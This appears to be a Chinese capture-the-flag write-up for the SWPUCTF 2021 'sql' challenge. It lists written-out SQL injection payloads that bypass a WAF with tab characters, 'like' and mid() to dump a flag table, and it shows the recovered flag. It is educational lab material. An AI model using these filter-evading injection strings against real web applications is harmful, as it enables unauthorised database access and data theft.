当前位置: 首页 > article >正文

NSS [SWPUCTF 2021 新生赛]sql

NSS [SWPUCTF 2021 新生赛]sql

很明显是sql,有waf。

image-20230623190517786

参数是wllm

image-20230623190537029

get型传参,有回显,单引号闭合,回显位3

image-20230623190746446

跑个fuzz看看waf

image-20230623191147064

过滤了空格 = and 报错注入

空格->%09
=->like
and->&&
爆库:test_db
-1%27union%09select%091,database(),3%23
获取:
-1%27union%09select%091,2,flag%09from%09LTLT_flag%23

长度被限制了

image-20230623192627470

还有mid可用

mid(str,start,[length])
str:截取的字符串  start:起始位置  length:截取的长度,可以忽略
payload:

-1%27union%09select%091,2,flag%09from%09LTLT_flag%23
NSSCTF{31d1c108-ddd1

-1%27union%09select%091,2,mid(flag,15)%09from%09LTLT_flag%23
8-ddd1-4c12-8896-c02

-1%27union%09select%091,2,mid(flag,30)%09from%09LTLT_flag%23
6-c0253d4fa243}

NSSCTF{31d1c108-ddd1-4c12-8896-c0253d4fa243}


http://www.kler.cn/a/104229.html

相关文章:

  • Photoshop(PS)安装教程(图文教程超详细)
  • Cassandra 设计最佳实践
  • USB学习(2):USB端点和传输协议(数据包、事物)详解
  • Kurento多对多webrtc会议搭建测试
  • Kafka - 3.x Kafka命令行操作
  • 【iOS逆向与安全】某音App直播间自动发666 和 懒人自动看视频
  • Spring读书笔记——bean创建(下)
  • Spring Boot 为什么会出现 ?
  • APP盾的防御机制及应用场景
  • python time 模块
  • XTU-OJ 1187-Candy
  • RocketMQ生产环境常见问题分析与总结
  • 微服务-Ribbon负载均衡
  • 【Python机器学习】零基础掌握VotingRegressor集成学习
  • 有六家机器视觉公司今年11月份初放假到明年春节后,除夕不放假看住企业不跑路,不倒闭,明年大家日子会越来越甜
  • rust学习—— 复合类型结构体、复合类型枚举、复合类型元组
  • 01、yudao-项目简介、功能列表、技术选型.md
  • LinkedHashMap 简单实现LRU
  • Windows10系统安装telnet命令
  • python html(文件/url/html字符串)转pdf